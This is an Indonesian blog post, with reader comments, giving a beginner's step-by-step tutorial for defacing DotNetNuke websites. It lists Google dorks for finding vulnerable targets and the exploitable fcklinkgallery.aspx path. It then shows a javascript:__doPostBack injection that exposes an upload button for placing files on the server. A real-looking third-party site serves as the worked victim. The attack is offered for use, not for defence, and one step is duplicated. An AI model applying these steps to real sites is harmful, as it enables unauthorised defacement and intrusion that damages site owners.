Kali ini saya akan share teknik deface dengan Dot Net Nuke atau biasa disebut DNN. Teknik ini sangat mudah sehingga cocok untuk pembelajaran bagi pemula. Untuk yang udah master lebih baik merem dulu. :v
Oke, langsung saja.
Google Dork :
- inurl:”/portals/0″
- inurl:fcklinkgallery.aspx
Dork lain silahkan dikembangkan sendiri.
Exploit : Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pertama, cari target di google dengan dork di atas. Nyarinya harus sabar. Dan ternyata alamat yang kita temukan adalah http://www.caslpo.com/Portals/0/kotek.xml
Kedua, masukkan exploitnya dimulai dari portals/0/ . Sehingga menjadi http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lalu pilih file. Hapus url di address bar dan ganti dengan script berikut javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Tunggu proses upload selesai. Dan letak hasil deface kalian ada di http://situs/portals/0/namafile
Sehinga hasil deface saya terletak di :
http://www.caslpo.com/portals/0/jkt.txt
Bagaimana ? Mudah kan ? Jika ada yang kurang jelas, silahkan bertanya di kotak komentar.
- NB : Ekstensi file yang bisa di upload adalah : swf, jpg, jpeg, JPE, gif, bmp, png, doc, xls, ppt, pdf, txt, xml, xsl, css, zip, 3gp, asf, asx, avi, flv, m4v, mov, mp4, mpe, mpeg, mpg, ram, rm, rmvb, wm, wmv, vob . Kalian tidak bisa upload shell php !
BlogS of Hariyanto says
karena saya bukan master..berarti tidak harus merem kan 🙂
chiaki says
:v
ilham haka says
bang DNN carinya dimana ?,
pemula
febriansyah haq says
Mayan buat koleksi 🙂
chiaki says
Hehehe
Masnady says
hehehehe saya sampai 2x baca sob.. tapi masih nggak mudeng.. mungkin kalau sambil praktek lebih cepet paham kali ya sob. tapi saya kan via hp. jadi nggak bisa sambil praktek..hehehehe
chiaki says
Kalo praktek cepet. :v
Rohis Facebook says
jd takut ntr ada yg ngejahilin blog aq…., bisa2 ilmu ini disalahgunakan *smile
chiaki says
Blogspot gak bisa. -_-
budi os 19 says
utk soal beginian mas yuyud paling ngetop deh 🙂
budi os 19 says
utk soal beginian mas yuyud paling ngetop deh 🙂
chiaki says
Saya hanya pemula sob. :v
Djangkaru Bumi says
Cuma geleng-geleng kepala sambil merem deh 😀
chiaki says
Hahaha. :v
Riyono says
Fungsi utamanya untuk apa itu sob 🙂
Abed Saragih says
Oh ini untuk mengubah deface tampilan awalan dari sebuah website yah sobat.
chiaki says
Gak harus awalan.
cik awi says
Ane merem dulu sob… Wkwkwk!
chiaki says
Master donk. (y)
cak oni says
nice kang , buat new be
chiaki says
Ya. :v
Anonim says
Hmm it seems like your blog ate my first comment (it was super long) so I guess I'll
just sum it up what I had written and say, I'm thoroughly
enjoying your blog. I too am an aspiring blog blogger but I'm still
new to the whole thing. Do you have any points for first-time blog writers?
I'd definitely appreciate it.
Feel free to visit my web site: minecraft free